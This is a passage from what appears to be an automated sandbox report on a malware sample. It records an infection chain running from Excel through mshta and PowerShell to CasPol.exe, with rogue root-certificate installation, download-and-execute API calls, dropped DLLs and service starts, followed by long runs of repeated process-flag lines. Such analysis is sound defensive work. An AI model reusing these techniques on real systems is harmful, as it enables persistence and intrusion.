                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_00416555 push 0000006Ah; retf 31_2_004165C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_004567E0 push eax; ret 32_2_004567FE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_0045B9DD push esi; ret 32_2_0045B9E6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_00463EF3 push ds; retf 32_2_00463EEC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_00455EAF push ecx; ret 32_2_00455EC2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_00433FF6 push ecx; ret 32_2_00434009

                  Persistence and Installation Behavior

                  barindex
                  Installs new ROOT certificates
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_00406128 ShellExecuteW,URLDownloadToFileW,32_2_00406128
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\tc3erle0\tc3erle0.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\sietgs52\sietgs52.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,32_2_00419BC4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,30_2_004047CB
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
